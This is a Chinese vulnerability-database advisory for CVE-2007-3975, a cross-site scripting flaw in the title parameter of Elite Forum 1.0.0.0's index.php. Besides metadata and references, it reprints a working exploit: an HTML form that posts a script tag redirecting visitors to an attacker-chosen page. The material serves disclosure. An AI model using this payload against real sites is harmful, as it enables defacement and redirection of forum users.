Elite Forum index.php 跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1189674 漏洞类型 跨站脚本
发布时间 2007-07-25 更新时间 2007-07-25
CVE编号 CVE-2007-3975 CNNVD-ID CNNVD-200707-469
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://www.securityfocus.com/bid/81630
https://cxsecurity.com/issue/WLB-2007070088
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-469
|漏洞详情
EliteForum1.0.0.0版本的index.php中存在跨站脚本攻击漏洞。远程攻击者可以借助一个ptopic操作中的标题参数,注入任意web脚本或HTML。该漏洞不同于CVE-2005-3412。
|漏洞EXP
c0ded: St@rExT
From : Turkey
exploit:

<title>Elite Forum FULL HTML ENjocter-By St@rEXT</title>
<style>
body{background:url(http://img523.imageshack.us/img523/7704/turkeyflag0x
uhz9zc7uf0.jpg);
color:#FFFFFF;
font-weight:bold;}
input{
background-color:darkred;
color:#FFFFFF;
font-weight:bold;
}
</style
<form method=POST action="http://site/path/index.php?act=ptopic&fid=1" target=_blank>
<b><em><h2><b>Elite Forum FULL HTML ENjocter-By St@rEXT</b></h2></em></b></font>
	<br>
	
	<b>Your HTML C0de : <br></b> 
	<input  size="60" type="text"  name="title" value='<script>location="http://yourindex.html"</script>'>

<BR><BR><BR><b>Forum Messages:</b><BR>

<input cols=2 rows=1 name='post'value='Bug On!!!'><BR><BR><br>
<input type=submit value="Send and Hacked">
	<BR><BR>

<BR><BR><BR>
	</form>
|受影响的产品
Elite Forum Elite Forum 1.0.0.0
|参考资料

来源:BUGTRAQ
名称:20070720EliteForumFullHTMLENjectversin1.0.0.0
链接:http://www.securityfocus.com/archive/1/archive/1/474228/100/0/thread
来源:OSVDB
名称:38998
链接:http://osvdb.org/38998
来源:SREASON
名称:2933
链接:http://securityreason.com/securityalert/2933